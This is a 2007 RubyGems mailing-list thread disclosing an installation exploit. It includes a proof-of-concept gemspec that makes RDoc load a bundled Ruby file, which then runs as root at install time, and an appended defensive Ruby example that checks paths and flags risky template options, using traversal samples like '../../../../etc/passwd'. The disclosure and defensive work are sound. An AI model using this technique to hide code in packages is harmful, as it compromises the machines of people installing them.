[Rubygems-developers] Need to release 0.9.1 due to security exploit

Paul Duncan pabs at pablotron.org
Sat Jan 13 01:58:15 EST 2007

* Eric Hodel (drbrain at segment7.net) wrote:
> I've checked in fixes for an installation exploit found by Gavin  
> Sinclair.  Here's a draft email describing the exploit and how to fix  
> RubyGems.  I only supplied patches for the past two versions of  
> RubyGems, since tattle says that's what everybody uses.
> Subject: RubyGems 0.9.0 and earlier installation exploit
> Problem Description:
> RubyGems does not check installation paths for gems before writing  
> files.

The potential security problems with RubyGems are actually much worse
than that.  Documentation and tests are executed as the user doing the
install (which, as you said, is usually root).  That means I can embed
arbitrary Ruby code in the documentation template, and it will
usually be run as root.  For example:

  # contents of malice.gemspec:

  spec = Gem::Specification.new do |s|
    # usual gem stuff here
    # ...

    # point RDoc at a template file shipped inside the gem itself
    s.rdoc_options = %w{--template ./malice.rb}
  end

  # contents of malice.rb:

  $stderr.puts "hello, i'm running as #{ENV['USER']}"
  exit 0

All of that produces the following:

  pabs at halcyon:~/proj/snippets/ruby/malice> gem build ./malice.gemspec 
    Successfully built RubyGem
    Name: Malicious-Gem
    Version: 0.1.0
    File: Malicious-Gem-0.1.0.gem
  pabs at halcyon:~/proj/snippets/ruby/malice> sudo gem install ./Malicious-Gem-0.1.0.gem 
  Successfully installed Malicious-Gem, version 0.1.0
  Installing ri documentation for Malicious-Gem-0.1.0...
  Installing RDoc documentation for Malicious-Gem-0.1.0...
  hello, i'm running as root

Obviously the same thing can be done with unit tests.  While neither of
these is a bug with RubyGems per se, they're both convenient places to
hide sneaky code that will be run as root on a lot of machines at
install time.

Paul Duncan <pabs at pablotron.org>        OpenPGP Key ID: 0x82C29562
http://www.pablotron.org/               http://www.paulduncan.org/
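Two defender-side checks for the two problems raised in this thread, added here as an illustration and not code from the thread or from RubyGems itself: a lexical check that a gem's file paths cannot escape the installation directory (Eric's path issue), and a scan of `rdoc_options` for a `--template` that points at a file inside the gem rather than a named RDoc template (Paul's issue). Function names, the policy they encode, and the assumption that `-T` is the short form of `--template` are this example's own; the sample paths are constructed.

```ruby
# Added example, not RubyGems code. Illustrates checks a gem installer
# (or a pre-install audit script) could run before writing files or
# generating documentation as root.
require "pathname"

# True only if `relative`, joined to `install_root`, still resolves to a
# location strictly inside `install_root`. Absolute paths and any ".."
# that climbs out of the root are rejected. The check is lexical
# (cleanpath), so it does not follow symlinks already on disk.
def safe_install_path?(install_root, relative)
  root = Pathname.new(install_root).cleanpath
  rel  = Pathname.new(relative)
  return false if rel.absolute?
  target = (root + rel).cleanpath
  target.to_s.start_with?(root.to_s + File::SEPARATOR)
end

# Returns the values of every --template / -T option in `rdoc_options`
# that looks like a path to a file (contains a separator or ends in .rb)
# instead of the name of an installed RDoc template. Such a value means
# the gem ships Ruby that rdoc will load, and therefore execute, during
# "gem install". Both "--template NAME" and "--template=NAME" forms are
# recognised; treating -T as the short form is an assumption of this example.
def risky_template_options(rdoc_options)
  opts = Array(rdoc_options)
  risky = []
  opts.each_with_index do |opt, i|
    value =
      if opt =~ /\A(?:--template|-T)=(.+)\z/
        $1
      elsif opt == "--template" || opt == "-T"
        opts[i + 1]
      end
    next if value.nil?
    risky << value if value.include?("/") || value.end_with?(".rb")
  end
  risky
end

if __FILE__ == $0
  # Constructed sample input modelled on the gemspec quoted in the thread.
  gem_dir = "/usr/lib/ruby/gems/1.8/gems/Malicious-Gem-0.1.0"
  %w[lib/malice.rb ../../../../etc/passwd /etc/passwd].each do |f|
    puts "#{f.ljust(28)} safe=#{safe_install_path?(gem_dir, f)}"
  end
  puts "risky templates: #{risky_template_options(%w{--template ./malice.rb}).inspect}"
end
```

An installer that applies `safe_install_path?` to every entry in the gem's file list before extraction, and refuses to run `rdoc` (or tests) when `risky_template_options` is non-empty, closes both holes without changing what well-behaved gems can do; named templates such as `html` still pass.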